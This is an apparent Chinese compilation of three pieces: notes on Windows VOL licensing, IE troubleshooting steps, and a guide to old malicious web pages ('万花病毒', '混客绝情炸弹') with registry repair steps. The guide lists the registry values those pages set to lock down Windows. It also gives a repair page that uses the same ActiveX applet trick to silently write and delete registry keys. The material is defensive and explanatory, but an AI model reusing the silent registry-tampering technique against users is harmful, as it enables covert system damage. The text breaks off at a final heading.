Volume Licensing for Organizations (VLO):团体批量许可证(大量采购授权合约),这是为团体购买而制定的一种优惠方式。这种产品的光盘的卷标都带有VOL字样,取Volume前3个字母,以表明是批量,比如英文WXP Pro的VOL版本的光盘卷标就是WXPVOL_EN,其中WX表示是Windows XP,P是Professional(VOL没有Home版本),VOL表明是团体批量许可证版本,EN是表明是英语。获得途径主要是集团购买,某些MSDN用户也可以得到。这种版本根据购买数量等又细分为“开放式许可证”、“选择式许可证”、“企业协议”、学术教育许可证”等以下5种版本:Open License 、Select License、Enterprise Agreement、Enterprise Subscription Agreement、Academic Volume Licensing。
由此可见,平时说的什么Select/Corp是许可证授权方式,他的出现是为了用若干种不同级别的优惠政策卖同一种软件,通过Select/Corp许可证授权方式得到的xxx的光盘都是VOL这一种、是并不是有很多种,只不过是相同的VOL光盘配以不同的许可证方式;而Volume Licensing (Product) Keys,即VLK,它所指的只是一个Key(密匙),仅仅是一个为证明产品合法化、以及安装所使用的Key,因为根据VOL计划规定,VOL产品是不需要激活的,或者说,VLK不是指一种版本,而是指这种版本在部署(Deploy)过程中所需要的Key,而需要VLK这种Key的版本应该叫做VOL!只不过在实际中,没有必要强调这种叫法、称呼的准确性,加之很多人的VOL版本光盘是通过企业的选择式许可证、企业协议等方式得到的等等原因,所以才会有很多人叫他为“选择版”等等。 官方网站有一个表格,上面有一句话:“Different products require different Volume Licensing Keys (VLKs). Refer to the table below to make sure you have the correct VLK for your Microsoft product.”,这就很好的说明了VLK指的是Key而不是产品了。 很明显的,FPP需要激活,VOL不需要激活。
总的来说,如果你在版本号中看到有字母,大多非正式版本。但也有一些软件比较特别,一直是beta版本,而从来没有正式版本的。
版本号的问题:也就是那一串数字。
一般形式为 "ver a.b.c"。这中间,a为主版本号。b为次版本号。c为更次。
次版本号的更新表示软件有微小的升级,一般不涉及bug的修正,如果您觉得次版本号更新频繁,可以不必理会,等主版本号更换后再作升级。当程序有比较大的升级时,将更换主版本号。
一般来说如果主版本号a.b升过级,都会要求重新注册或者购买。特别是a。有些软件如果升b,也还是可以使用原来的注册信息,不必重新注册的。
IE常见错误分析
当你驾着心爱的IE在Internet上纵横驰骋时,突然桌面上弹出一个莫名其妙的警告提示框,紧接着所有IE窗口全部关闭;或无论如何点击链接
,IE始终没有反应……这些故障让人心烦意乱,无可奈何。不过你也不用手足无措,今天我们就一起将IE常见错误揪出来,并彻底消灭!
1.发送错误报告
【故障现象】
在使用IE浏览网页的过程中,出现“Microsoft Internet Explorer遇到问题需要关闭……”的信息提示。此时,如果单击“发送错误报告
”按钮,则会创建错误报告,单击“关闭”按钮之后会引起当前IE窗口关闭;如果单击“不发送”按钮,则会关闭所有IE窗口。
【故障点评】
这是IE为了解用户在使用中的错误而设计的一个小程序,不过我可不想当微软的“免费测试员”,更何况每天它都会面对成千上万的报告
,谁知道有没有在意我的报告问题呢?
【故障解决】
针对不同情况,可分别用以下方法关闭IE发送错误报告功能:
①对IE 5.x用户,执行“控制面板→添加或删除程序”,在列表中选择“Internet Explorer Error Reporting”选项,然后单击“更改/
删除”按钮,将其从系统中删除。
②对Windows 9x/Me/NT/2000下的IE 6.0用户,则可打开“注册表编辑器”,找[HKEY_LOCAL_MACHINE\Software \Microsoft\Internet
Explorer\Main],在右侧窗格创建名为IEWatsonEnabled的DWORD双字节值,并将其赋值为0。
③对Windows XP的IE 6.0用户,执行“控制面板→系统”,切换到“高级”选项卡,单击“错误报告”按钮,选中“禁用错误报告”选项
,并选中“但在发生严重错误时通知我”,最后单击“确定”按钮。
2.IE发生内部错误,窗口被关闭
【故障现象】
在使用IE浏览一些网页时,出现错误提示对话框:“该程序执行了非法操作,即将关闭……”,单击“确定”按钮后又弹出一个对话框,提
示“发生内部错误……”。单击“确定”按钮后,所有打开的IE窗口都被关闭。
【故障点评】
该错误产生原因多种多样,内存资源占用过多、IE安全级别设置与浏览的网站不匹配、与其他软件发生冲突、浏览网站本身含有错误代码
……这些情况都有可能,需要耐心加以解决。
【故障解决】
①关闭过多的IE窗口。如果在运行需占大量内存的程序,建议IE窗口打开数不要超过5个。
②降低IE安全级别。执行“工具→Internet选项”菜单,选择“安全”选项卡,单击“默认级别”按钮,拖动滑块降低默认的安全级别。
③将IE升级到最新版本。IE 6.0下载地址: http://download.sina.com.cn/cgi-bin...l.cgi?s_id=6041 。
可使用以IE为核心的浏览器,如MyIE2。它占用系统资源相对要少,而且当浏览器发生故障关闭时,下次启动它,会有“是否打开上次发生
错误时的页面”的提示,尽可能地帮你挽回损失。下载地址: http://dl.pconline.com.cn/html/1 ... &pn=0&.html
3.出现运行错误
【故障现象】
用IE浏览网页时弹出“出现运行错误,是否纠正错误”对话框,单击“否”按钮后,可以继续上网浏览。
【故障点评】
可能是所浏览网站本身的问题,也可能是由于IE对某些脚本不支持。
【故障解决】
①启动IE,执行“工具→Internet选项”菜单,选择“高级”选项卡,选中“禁止脚本调试”复选框,最后单击“确定”按钮即可。
②将IE浏览器升级到最新版本。
4.IE窗口始终最小化的问题
【故障现象】
每次打开的新窗口都是最小化窗口,即便单击“最大化”按钮后,下次启动IE后新窗口仍旧是最小化的。
【故障点评】
IE具有“自动记忆功能”,它能保存上一次关闭窗口后的状态参数,IE本身没有提供相关设置选项,不过可以借助修改注册表来实现。
【故障解决】
①打开“注册表编辑器”,找到[HKEY_ CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Old WorkAreas],然后选
中窗口右侧的“OldWorkAreaRects”,将其删除。
②同样在“注册表编辑器”中找到[HKEY_CURRENT_USER\Software \Microsoft\Internet Explorer\Main],选择窗口右侧的“
Window_Placement”,将其删除。
③退出“注册表编辑器”,重启电脑,然后打开IE,将其窗口最大化,并单击“往下还原”按钮将窗口还原,接着再次单击“最大化”按
钮,最后关闭IE窗口。以后重新打开IE时,窗口就正常了!
5.IE无法打开新窗口
【故障现象】
在浏览网页过程中,单击超级链接无任何反应。
【故障点评】
多半是因为IE新建窗口模块被破坏所致。
【故障解决】
单击“开始→运行”,依次运行“regsvr32 actxprxy.dll”和“regsvr32 shdocvw.dll”将这两个DLL文件注册,然后重启系统。如果还
不行,则可以将mshtml.dll、urlmon.dll、msjava.dll、browseui.dll、oleaut32.dll、shell32.dll也注册一下。
6.脱机却无法浏览本机上的网页
【故障现象】
通过IE的“脱机浏览”功能,我们差不多能浏览所有已经下载到本地硬盘的网页内容,这对拨号上网的用户来说更是省钱的一****宝。但
有时,目标网页虽然在硬盘上,但是却提示“无法浏览”。
【故障点评】
这多半是由于你修改了系统时间,引起了IE历史记录的错乱。
【故障解决】
①可用直接在“临时文件夹”中搜索的方法来激活它。按下Win+F,在“包含文字”处输入部分记忆中的关键字,在“搜索”处按“浏览”
按钮选择IE临时文件夹的地址,如“C:\WINDOWS\Temporary Internet Files”,单击“开始查找”,在结果列表里双击目标页打开。
②可以尝试用腾讯的TE等浏览器来脱机浏览。
7.联网状态下,浏览器无法打开某些站点
【故障现象】
上网后,在浏览某些站点时遇到各种不同的连接错误。
【故障点评】
这种错误一般是由于网站发生故障或者你没有浏览权限所引起。
【故障解决】
针对不同的连接错误,IE会给出不同的错误信息提示,比较常见的有以下几个:
①提示信息:404 NOT FOUND这是最为常见的IE错误信息。主要是因为IE不能找到你所要求的网页文件,该文件可能根本不存在或者已经被
转移到了其他地方。
②提示信息:403 FORBIDDEN常见于需要注册的网站。一般情况下,可以通过在网上即时注册来解决该问题,但有一些完全“封闭”的网站
还是不能访问的。
③提示信息:500 SERVER ERROR通常由于所访问的网页程序设计错误或者数据库错误而引起,你只有等待对方网页纠正错误后再浏览了。
大家在遇到IE错误提示信息,但是搞不清楚的时候,可以去这里查阅: http://www.cfan.com.cn/09net/19ie.htm 。
8.IE无法重新安装
【故障现象】
IE不能正常使用,在重装时却提示“发现系统中有该版本的IE”而拒绝安装;“添加或删除程序”中又没有卸载选项。
【故障点评】
“重装”是解决IE故障的“终极****”,也是初级用户的法宝。
【故障解决】
①对IE 5.0的重装可按以下步骤进行:
第一步:打开“注册表编辑器”,找到[HKEY_LOCAL_ MACHINE\Software\Microsoft\Internet Explorer],单击其下的Version Vector
键。
第二步:在右侧窗格中双击IE子键,将原来的“5.0002”改为“4.0”,单击“确定”后退出“注册表编辑器”。
第三步:重启后,就可以重装IE 5.0了。
②IE 6.0的重装有两种方法:
方法1:打开“注册表编辑器”,找到[HKEY_LOCAL_ MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\
{89820200-ECBD-11cf-8B85-00AA005B4383}],将IsInstalled的DWORD值改为0就可以了。
方法2:放入Windows XP安装盘,在“开始→运行”窗口键入“rundll32.exe setupapi,InstallHinfSection DefaultInstall 132
%windir%\Inf\ie.inf”。
网络恶意代码安全手册
一、恶意代码的起源
电子邮件病毒的危害很多人已经深有体会,相信很多人都曾遭受过电子邮件的毒手。互联网上80%左右的流行病毒都是通过电子邮件传播的,我们相对来讲对电子邮件病毒都有了一定的防范意识,知道采取一些针对性的措施来防范邮件病毒。但同时,另外一种安全危险却被大家普遍忽视,那就是恶意网页。
其实恶意网页早就不是什么新鲜东西,甚至恶意网页的历史比电子邮件病毒的时间都长,它是伴随着互联网的出现而出现的,跟互联网同步发展;恶意网页前些年不像现在这么普遍存在,同时恶意网页大多数是在一些个人站点的页面上,访问的绝对数量不小,相对数量较少,同时恶意网页一般不具备传染性,所以恶意网页的危害性没有象电子邮件病毒一样产生那么大的危害。大部分是IE首页被修改等,但是自从“万花病毒”的出现改变了人们对网页代码的看法。
从去年开始,恶意网页的危害性渐渐的爆发出来,很多用户受到恶意网页的攻击,注册表被修改。恶意网页的比例上升的很快,到去年年底的时候恶意网页的求救信已经基本和邮件病毒持平,远远超过电子邮件病毒,所以,恶意网页已经成为互联网世界的头号敌人,虽然直接危害暂时还不能和电子邮件相抗衡,但是恶意网页将会是一个长期存在,对互联网安全构成重大威胁的新敌人,足以引起所有上网用户的重视。
网页恶意代码到底是怎么产生的呢?其实它也和病毒一样是人为制造出来的,早期的制造恶意代码的人大多数是出于个人目的,或是为了提高自己
3
网站的知名度、提高网站的浏览量,或者纯粹是一种恶作剧、一种破坏行为,他们通过在其开通的网站主页源程序里加入几行具有破坏性的代码,当用户打开网页进行浏览是能够修改用户的注册表,后果主要表现在IE默认主页被修改,发展到后来出现了最有代表性的具有破坏性的网页恶意代码如“万花病毒”和“混客绝情炸弹”。遭受恶意代码破坏的用户往往不清楚自己到底是遭受到病毒的破坏还是黑客的攻击,往往手足无措。这个时候往往需要手动修改注册表,而修改注册表对于普通用户来说又不是一件很容易的事,大多数都会不知所措。本文以网络上常见的恶意代码病毒详细的介绍了各种恶意代码的原理和预防、解决方法,使每一位朋友能解决在网络中遇到的问题。
二、恶意代码的解决方法
那么有没有一种新的办法能够有效的防止恶意网页的侵害呢?答案是肯定的,因为恶意代码都是通过利用ActiveX修改注册表重要键值来达到其破坏目的,我们实现对注册表的监视,禁止非法修改注册表就能起到防止作用,能够彻底断绝恶意网页的传播和非法破坏!对于已经受到恶意代码攻击的电脑我们可以自行修改注册表达到解决的方法。现在各个杀毒公司都在自己的软件监测中加入了恶意代码的分析和预防,把恶意代码列为病毒来查杀。如江民公司采用的“比特动态滤毒”技术来对付恶意网页,它一方面在网页下载到硬盘之前进行实时过滤分析,滤除有害部分代码,保留原有的网页内容,另一方面监视注册表,当注册表的重要系统键值被修改时,会自动报警。彻底断绝了恶意网页的传播途径!
4
三、恶意代码大曝光
恶意代码注意是通过插在网页中的代码来修改浏览者的注册表而起破坏作用的,如禁止注册表、修改IE首页、修改IE标题栏、修改IE右键菜单、修改IE默认搜索引擎、系统启动时弹出对话框、IE中鼠标右键失效、查看“源文件”菜单被禁用、部分菜单被禁止等。下面我们详细介绍他们的原理和修改方法。
1、浏览网页注册表被禁用
这是由于注册表
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
下的DWORD值“DisableRegistryTools”被修改为“1”的缘故,将其键值恢复为“0”即可恢复注册表的使用。
解决办法:
用记事本程序建立以REG为后缀名的文件,将下面这些内容复制在其中就可以了:
REGEDIT4 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
“DisableRegistryTools”=dword:00000000
5
2、篡改IE的默认页
有些IE被改了起始页后,即使设置了“使用默认页”仍然无效,这是因为IE起始页的默认页也被篡改了。具体说就是以下注册表项被修改:
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL
“Default_Page_URL”这个子键的键值即起始页的默认页。
解决办法:
运行注册表编辑器,然后展开上述子键,将“Default_Page_UR”子键的键值中的那些篡改网站的网址改掉就行了,或者将其设置为IE的默认值。
3、修改IE浏览器缺省主页,并且锁定设置项,禁止用户更改
主要是修改了注册表中IE设置的下面这些键值(DWORD值为1时为不可选):
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
"Settings"=dword:1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
"Links"=dword:1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
6
"SecAddSites"=dword:1
解决办法:
将上面这些DWORD值改为“0”即可恢复功能。
4、IE的默认首页灰色按扭不可选
这是由于注册表
HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel
下的DWORD值“homepage”的键值被修改的缘故。原来的键值为“0”,被修改后为“1”(即为灰色不可选状态)。
解决办法:
将“homepage”的键值改为“0”即可。
5、IE标题栏被修改
在系统默认状态下,是由应用程序本身来提供标题栏的信息,但也允许用户自行在上述注册表项目中填加信息,而一些恶意的网站正是利用了这一点来得逞的:它们将串值Window Title下的键值改为其网站名或更多的广告信息,从而达到改变浏览者IE标题栏的目的。
具体说来受到更改的注册表项目为:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title
HKEY_CURRENT_USER\Software\Microsoft\Internet
7
Explorer\Main\Window Title
解决办法:
①在Windows启动后,点击“开始”→“运行”菜单项,在“打开”栏中键入regedit,然后按“确定”键;
②展开注册表到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值“Window Title” ,将该串值删除即可,或将Window Title的键值改为“IE浏览器”等你喜欢的名字;
③同理,展开注册表到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
然后按②中所述方法处理。
④退出注册表编辑器,重新启动计算机,运行IE,你会发现困扰你的问题被解决了!
6、IE右键菜单被修改
受到修改的注册表项目为:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt
下被新建了网页的广告信息,并由此在IE右键菜单中出现!
解决办法:
打开注册标编辑器,找到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt
删除相关的广告条文即可,注意不要把下载软件FlashGet和Netants也
8
删除掉,这两个可是“正常”的,除非你不想在IE的右键菜单中见到它们。
7、IE默认搜索引擎被修改
在IE浏览器的工具栏中有一个搜索引擎的工具按钮,可以实现网络搜索,被篡改后只要点击那个搜索工具按钮就会链接到那个篡改网站。出现这种现象的原因是以下注册表被修改:
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant
解决办法:
运行注册表编辑器,依次展开上述子键,将“CustomizeSearch”和“SearchAssistant”的键值改为某个搜索引擎的网址即可。
8、系统启动时弹出对话框
受到更改的注册表项目为:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon
在其下被建立了字符串“LegalNoticeCaption”和“LegalNoticeText”,其中“LegalNoticeCaption”是提示框的标题,“LegalNoticeText”是提示框的文本内容。由于它们的存在,就使得我们每次登陆到Windwos桌面前都出现一个提示窗口,显示那些网页的广告信息!
9
解决办法:
打开注册表编辑器,找到
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon
这一个主键,然后在右边窗口中找到“LegalNoticeCaption”和“LegalNoticeText”这两个字符串,删除这两个字符串就可以解决在登陆时出现提示框的现象了。
9、IE默认连接首页被修改
IE浏览器上方的标题栏被改成“欢迎访问??网站”的样式,这是最常见的篡改手段,受害者众多。
受到更改的注册表项目为:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
通过修改“Start Page”的键值,来达到修改浏览者IE默认连接首页的目的,如浏览“万花谷”就会将你的IE默认连接首页修改为“http://on888.home.chinaren.com ”,即便是出于给自己的主页做广告的目的,也显得太霸道了一些,这也是这类网页惹人厌恶的原因。
解决办法:
①在Windows启动后,点击“开始”→“运行”菜单项,在“打开”栏
10
中键入regedit,然后按“确定”键;
②展开注册表到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值“Start Page”双击,将Start Page的键值改为“about:blank”即可;
③同理,展开注册表到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
在右半部分窗口中找到串值“Start Page”,然后按②中所述方法处理。
④退出注册表编辑器,重新启动计算机,一切OK了!
特殊例子:当IE的起始页变成了某些网址后,就算你通过选项设置修改好了,重启以后又会变成他们的网址啦,十分的难缠。其实他们是在你机器里加了一个自运行程序,它会在系统启动时将你的IE起始页设成他们的网站。
解决办法:运行注册表编辑器regedit.exe,然后依次展开
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
主键,然后将其下的registry.exe子键删除,然后删除自运行程序c:\Program Files\registry.exe,最后从IE选项中重新设置起始页。
10、IE中鼠标右键失效
浏览网页后在IE中鼠标右键失效,点击右键没有任何反应!
有的网络**为了达到其恶意宣传的目的,将你的右键弹出的功能菜单进行
11
了修改,并且加入了一些乱七八糟的东西,甚至为了禁止你下载,将IE窗口中单击右键的功能都屏蔽掉。
解决办法:
1.右键菜单被修改。打开注册表编辑器,找到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt,删除相关的广告条文。
2.右键功能失效。打开注册表编辑器,展开到HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions,将其DWORD值"NoBrowserContextMenu"的值改为0。
11、查看“源文件”菜单被禁用
在IE窗口中点击“查看”→“源文件”,发现“源文件”菜单已经被禁用。
恶意网页修改了注册表,具体的位置为:
在注册表
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
下建立子键“Restrictions”,然后在“Restrictions”下面建立两个DWORD值:
“NoViewSource”和“NoBrowserContextMenu”,并为这两个DWORD值赋值为“1”。
在注册表
12
HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions
下,将两个DWORD值:“NoViewSource”和“NoBrowserContextMenu”的键值都改为了“1”。
通过上面这些键值的修改就达到了在IE中使鼠标右键失效,使“查看”菜单中的“源文件”被禁用的目的。
解决办法:
将以下内容另存为后缀名为.reg的注册表文件,比如说unlock.reg,双击unlock.reg导入注册表,不用重启电脑,重新运行IE就会发现IE的功能恢复正常了。
REGEDIT4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions
“NoViewSource”=dword:00000000
"NoBrowserContextMenu"=dword:00000000
HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions
“NoViewSource”=dword:00000000
“NoBrowserContextMenu”=dword:00000000
12、浏览网页开始菜单被修改
这是最“狠”的一种,让浏览者有生不如死的感觉。浏览后不仅有类似
13
上面所说的那些症状,还会有以下更悲惨的遭遇:
1)禁止“关闭系统”
2)禁止“运行”
3)禁止“注销”
4)隐藏C盘——你的C盘找不到了!
5)禁止使用注册表编辑器regedit
6)禁止使用DOS程序
7)使系统无法进入“实模式”
8)禁止运行任何程序
“万花病毒”就是采用了以上的方法,后面我们将重点分析“万花病毒”。
13、禁止鼠标右键,否则弹出大量窗口消耗系统资源直到死机
这种情况是网页制作者不希望你查看他的源代码,当你使用鼠标右键查看代码时,网页就会弹出大量窗口,消耗你的系统资源直到死机,这种网页代码在国内不多见。
预防方法:不查看源代码,如果要看可以采用另存为先保存网页再用编辑软件查看。
14、网页中插入病毒
有的网页被插入了病毒,当你浏览时就会被病毒感染,如有的被插入欢乐时光的变种病毒等,这些大多是由于网页编制者自己的疏忽造成的。
预防方法:不浏览该页,安装在线监控杀毒软件,如KV3000、瑞星、金
14
山毒霸等都能防止。
15、共享你的硬盘
当你浏览网页时不小心你的C盘被改为完全共享!这样黑客可以用SMB扫描器直接登陆你的C盘,他可以在硬盘中随意拷贝文件,删除文件,添加文件??并且可以给你上传木马,永久而全面地控制你的机器。
这一般是利用了MS.ActiveX元件的写注册表的功能,还有的是调用FileSystemObject元件(文件系统对象)。病毒首先得到你的Windows目录和System目录,再修改注册表,把你的启动目录——"C:\WINDOWS\Start Menu\Programs\启动"设置为完全共享。
防备方法:将ActiveX元件、Java脚本和Vbs脚本等全部禁止就可以避免Bingo。
具体方法是:在Internet Explorer菜单中点击“工具”——“Internet选项”,在弹出的对话框中选择“安全”标签,再点击“自定义级别”按钮,就会弹出“安全设置”对话框,把其中所有ActiveX控件以及Java和Vbs脚本相关全部选择“禁用”即可。不过,这样做在以后的网页浏览过程中可能会造成一些善意使用脚本和控件的网站无法正常浏览。当然最好是安装杀毒软件实现在线监控。
我们在后面将详细介绍该病毒。
15
四、主要网页病毒的分析
1、万花病毒
该病毒是一个比较有代表性的恶意代码网页病毒,最先由搜毒网发现,并提交给了江民科技,具体如下:
该病毒是在一个叫“万花谷”的网站传出,这是利用Java 最新技术进行破坏的一个恶意代码。
该病毒的技术特征和修复方法:
JS/On888是一个新的含有有害代码的ActiveX网页文件,它通过在一个网络地址来对计算机用户造成破坏,其破坏特性如下:
(1)用户不能正常使用WINDOWS的DOS功能程序;
(2)用户不能正常退出WINDOWS,
(3)开始菜单上的“关闭系统”、“运行”等栏目被屏蔽,防止用户重新以DOS方式启动,关闭DOS命令、关闭REGEDIT命令等。
(4)将IE的浏览器的首页和收藏夹中都加入了含有该有害网页代码的网络地址。
具体的表现形式是:
a网络地址是:www.on888.xxx.xxx.com;
b在IE的“收藏夹”中自动加上“万花谷”的快捷方式, 网络地址是:"http://96xx.xxx.com";
进入该网页的话,如果你的浏览器的版本在IE4.0以上,那么该网页显示的是一个有光效滤镜的网页,随着鼠标的移动,会造成光线照在网页图片
16
不同地方的效果,光效一共有4种。
将IE的首页通过系统注册表项
HKEY_LOCAL_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", 设置成为"on888.xxx.xxx.com/";
为了达到该网页文件的破坏性,该ActiveX 对系统的注册表做了如下的修改:
首先在开始菜单上禁止了“运行”项目,使用户不能通过通常的注册表编辑器来修改该有害网页对系统注册表的修改:
以下的注册表项表现在没有“运行”菜单:
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun";
以下的注册表项表现在没有“关闭系统”项目:
“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose";
以下的注册表项表现在没有“注销”项目;
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff";
以下的注册表项表现在没有所有的逻辑驱动器:
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives";
以下的注册表项表现在禁止注册表的编辑工具REGEDIT:
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Sys
17
tem\\DisableRegistryTools
以下的注册表项表现在没有桌面:
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop";
以下的注册表项表现在禁止运行所有的DOS应用程序;
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled";
以下的注册表项表现在系统不能启动到“实模式(传统的DOS模式)”下;
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode";
以下的注册表项表现在WINDOWS系统登录时显示一个登录窗口(在MICROSOFT 网络用户登录之前):
"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption",(窗口的标题是) "欢迎来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系!");
"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", (窗口中的文字是)"欢迎来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系!");
以下的注册表项表现在所有IE的窗口都会加上以下的WINDOWS标题窗口:
"HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "欢迎来到万花谷!请与OICQ:4040465联系!");
18
"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "欢迎来到万花谷!请与OICQ:4040465联系!");
最后的表现是在用户的计算机的IE浏览器上打开无数的窗口,使得IE根本无法使用。同时用户正常的一些功能:桌面、开始中的运行、DOS方式、REGEDIT等都无法使用。
受害用户的修复方法:系统的注册表的恢复,建议用户使用F8启动到MSDOS方式下,使用SCANREG/RESTORE命令来恢复原来正常的注册表。
恢复系统注册表时必须将WINDOWS登录时的键值同时修改,去掉登录时出现的WINDOWS登录的对话框,具体涉及的注册表键值是:
"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption"(窗口的标题是) "欢迎来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系,和
"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "欢迎来到万花谷!请与OICQ:4040465联系!"
以避免计算机的IE浏览器上打开无数的窗口,使得IE无法使用。
对于IE收藏夹中的地址信息去掉的方法是:将WINDOWS的安装目录(一般是WINDOWS)下的Favorites目录下的文件:"万花谷.URL"删除该文件。
还有另一种恢复方法:该方法对WINDOWS9X有效,中毒后你找到WINDOWS下的系统备份文件恢复注册表。并把.HTA文件删除就可以恢复到没有中毒前的状态。
19
2、混客绝情炸弹
手工清除“混客绝情炸弹”指南
清除以下键值
HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page
删除以下键
HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title
HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title
删除以下主键(包括子键)
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
最后自己手工清除收藏夹中的连接
自动修复“混客绝情炸弹”方法
当然你可以采用网页代码自己自动修复“混客绝情炸弹”的破坏,你把以下的代码保存为.htm文件,在本机运行后就可以自动修复。
<HTML>
<head>
<TITLE>混客炸弹破解</TITLE>
20
<meta name="keywords" content="注册表,恶意代码,修改注册表">
<meta name="description" content="Robonic修改,QQ:10000022,www.J3J4.com">
</head>
<SCRIPT>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function a(){
try
{
b=document.applets[0];
b.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
b.createInstance();
c = b.GetObject();
try
{
c.RegDelete("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\");
c.RegWrite("HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","about:blank");
c.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","Microsoft Internet Explorer");
21
c.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","Microsoft Internet Explorer");
c.RegWrite("HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","Microsoft Internet Explorer");
c.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption","");
c.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText","");
c.RegDelete("HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\RemoteAccess\\NoLogon");
c.RegDelete("HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives");
c.RegDelete("HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose");
c.RegDelete("HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop");
c.RegDelete("HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff");
c.RegDelete("HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun");
c.RegDelete("HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled");
22
c.RegDelete("HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode");
}
catch(e)
{}
}
catch(e)
{}
}
function d()
{
setTimeout("a()", 0);
}
d();
</SCRIPT>
<OBJECT id=closes type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<param name="Command" value="Close">
</object>
<input type="button" value="请重新启动一下" onclick="closes.Click();">
</HTML>
23
3、笑林广记笑话网共享你的硬盘
HTML源文件
